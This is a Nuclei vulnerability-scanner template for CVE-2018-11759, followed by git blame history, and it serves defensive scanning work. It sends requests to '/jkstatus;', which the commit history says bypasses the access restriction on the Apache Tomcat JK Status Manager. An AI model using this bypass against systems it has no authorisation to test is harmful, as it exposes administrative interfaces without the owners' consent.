nuclei-templates/cves/CVE-2018-11759.yaml

id: cve-2018-11759

info:
  name: Apache Tomcat JK Status Manager Access
  author: Harsh Bothra
  severity: medium

# Source:- https://github.com/immunIT/CVE-2018-11759

requests:
  - method: GET
    path:
      - '{{BaseURL}}/jkstatus'
      - '{{BaseURL}}/jkstatus;'

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        words:
          - "JK Status Manager"
Normalized id fields to match schema regex 2020-09-15 19:25:55 +00:00			`id: cve-2018-11759`
Create CVE-2018-11759.yaml Apache Tomcat JK Status Manager Access 2020-07-06 16:28:42 +00:00
			`info:`
			`name: Apache Tomcat JK Status Manager Access`
			`author: Harsh Bothra`
adding both path for possilbe use cases 2020-08-06 08:12:12 +00:00			`severity: medium`
Create CVE-2018-11759.yaml Apache Tomcat JK Status Manager Access 2020-07-06 16:28:42 +00:00
adding both path for possilbe use cases 2020-08-06 08:12:12 +00:00			`# Source:- https://github.com/immunIT/CVE-2018-11759`
Create CVE-2018-11759.yaml Apache Tomcat JK Status Manager Access 2020-07-06 16:28:42 +00:00
			`requests:`
			`- method: GET`
			`path:`
adding both path for possilbe use cases 2020-08-06 08:12:12 +00:00			`- '{{BaseURL}}/jkstatus'`
Add semicolon to path The vulnerability is that access restriction can be circumvented by adding a semicolon to the path (as pointed out in https://github.com/immunIT/CVE-2018-11759). Without semicolon, jkstatus would be public anyway and would not be related to the CVE. 2020-08-06 08:06:13 +00:00			`- '{{BaseURL}}/jkstatus;'`
Create CVE-2018-11759.yaml Apache Tomcat JK Status Manager Access 2020-07-06 16:28:42 +00:00
Update CVE-2018-11759.yaml 2020-07-06 17:13:45 +00:00			`matchers-condition: and`
Create CVE-2018-11759.yaml Apache Tomcat JK Status Manager Access 2020-07-06 16:28:42 +00:00			`matchers:`
			`- type: status`
			`status:`
			`- 200`
			`- type: word`
			`words:`
			`- "JK Status Manager"`